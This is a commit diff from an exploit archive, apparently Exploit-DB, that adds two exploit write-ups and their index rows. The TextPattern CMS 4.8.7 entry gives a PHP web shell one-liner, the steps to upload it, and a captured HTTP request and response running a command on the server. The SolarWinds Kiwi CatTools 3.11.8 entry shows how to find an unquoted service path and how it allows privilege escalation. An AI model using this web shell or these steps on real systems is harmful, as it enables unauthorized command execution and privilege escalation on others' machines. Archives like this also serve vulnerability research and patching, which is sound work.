DB: 2021-10-15

2 changes to exploits/shellcodes SolarWinds Kiwi CatTools 3.11.8 - Unquoted Service Path TextPattern CMS 4.8.7 - Remote Command Execution (RCE) (Authenticated)
2021-10-15 05:02:17 +00:00 · 2021-10-15 05:02:17 +00:00 · 3e8f9f4d30
commit 3e8f9f4d30
parent 679a62755b
3 changed files with 83 additions and 0 deletions
--- a/exploits/php/webapps/50415.txt
+++ b/exploits/php/webapps/50415.txt
@ -0,0 +1,43 @@
+# Exploit Title: TextPattern CMS 4.8.7 - Remote Command Execution (RCE) (Authenticated)
+# Date: 2021/09/06
+# Exploit Author: Mert Daş merterpreter@gmail.com
+# Software Link: https://textpattern.com/file_download/113/textpattern-4.8.7.zip
+# Software web: https://textpattern.com/
+# Tested on: Server: Xampp
+
+First of all we should use file upload section to upload our shell.
+Our shell contains this malicious code: <?PHP system($_GET['cmd']);?>
+
+1) Go to content section .
+2) Click Files and upload malicious php file.
+3) go to yourserver/textpattern/files/yourphp.php?cmd=yourcode;
+
+After upload our file , our request and response is like below :
+
+Request:
+
+GET /textpattern/files/cmd.php?cmd=whoami HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0)
+Gecko/20100101 Firefox/89.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: txp_login_public=18e9bf4a21admin; language=en-gb; currency=GBP;
+PHPSESSID=cctbu6sj8571j2t6vp7g8ab7gi
+Upgrade-Insecure-Requests: 1
+
+
+Response:
+
+HTTP/1.1 200 OK
+Date: Thu, 10 Jun 2021 00:32:41 GMT
+Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.4.20
+X-Powered-By: PHP/7.4.20
+Content-Length: 22
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+pc\mertdas
--- a/exploits/windows/local/50416.txt
+++ b/exploits/windows/local/50416.txt
@ -0,0 +1,38 @@
+# Exploit Title: SolarWinds Kiwi CatTools 3.11.8 - Unquoted Service Path
+# Exploit Author: Mert DAŞ
+# Version: 3.11.8
+# Date: 14.10.2021
+# Vendor Homepage: https://www.solarwinds.com/
+# Tested on: Windows 10
+
+# Step to discover Unquoted Service Path :
+
+--------------------------------------
+C:\Users\Mert>sc qc CatTools
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: CatTools
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files (x86)\CatTools3\nssm.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : CatTools
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+---------------------------------------------
+
+Or:
+-------------------------
+C:\Users\Mert>wmic service get name,displayname,pathname,startmode |findstr
+/i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
+----------------------
+
+#Exploit:
+
+A successful attempt would require the local user to be able to insert
+their code in the system root path undetected by the OS or other security
+applications where it could potentially be executed during application
+startup or reboot. If successful, the local user's code would execute with
+the elevated privileges of the application.
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -11348,6 +11348,7 @@ id,file,description,date,author,type,platform,port
 50332,exploits/windows/local/50332.py,"Ether_MP3_CD_Burner 1.3.8 - Buffer Overflow (SEH)",1970-01-01,stresser,local,windows,
 50337,exploits/windows/local/50337.ps1,"XAMPP 7.4.3 - Local Privilege Escalation",1970-01-01,"Salman Asad",local,windows,
 50385,exploits/linux/local/50385.txt,"Google SLO-Generator 2.0.0 - Code Execution",1970-01-01,"Kiran Ghimire",local,linux,
+50416,exploits/windows/local/50416.txt,"SolarWinds Kiwi CatTools 3.11.8 - Unquoted Service Path",1970-01-01,"Mert Daş",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
@ -42672,6 +42673,7 @@ id,file,description,date,author,type,platform,port
 47161,exploits/php/webapps/47161.php,"MyBB < 1.8.21 - Remote Code Execution",1970-01-01,"Giovanni Chhatta",webapps,php,
 47177,exploits/php/webapps/47177.txt,"Moodle Filepicker 3.5.2 - Server Side Request Forgery",1970-01-01,"Fabian Mosch_ Nick Theisinger",webapps,php,80
 47179,exploits/jsp/webapps/47179.py,"Ahsay Backup 8.1.1.50 - Insecure File Upload and Code Execution (Authenticated)",1970-01-01,"Wietse Boonstra",webapps,jsp,
+50415,exploits/php/webapps/50415.txt,"TextPattern CMS 4.8.7 - Remote Command Execution (RCE) (Authenticated)",1970-01-01,"Mert Daş",webapps,php,
 47180,exploits/jsp/webapps/47180.rb,"Ahsay Backup 7.x - 8.1.1.50 - Authenticated Arbitrary File Upload / Remote Code Execution (Metasploit)",1970-01-01,"Wietse Boonstra",webapps,jsp,443
 47181,exploits/jsp/webapps/47181.txt,"Ahsay Backup 7.x - 8.1.1.50 - XML External Entity Injection",1970-01-01,"Wietse Boonstra",webapps,jsp,80
 47182,exploits/php/webapps/47182.html,"WordPress Plugin Simple Membership 3.8.4 - Cross-Site Request Forgery",1970-01-01,rubyman,webapps,php,80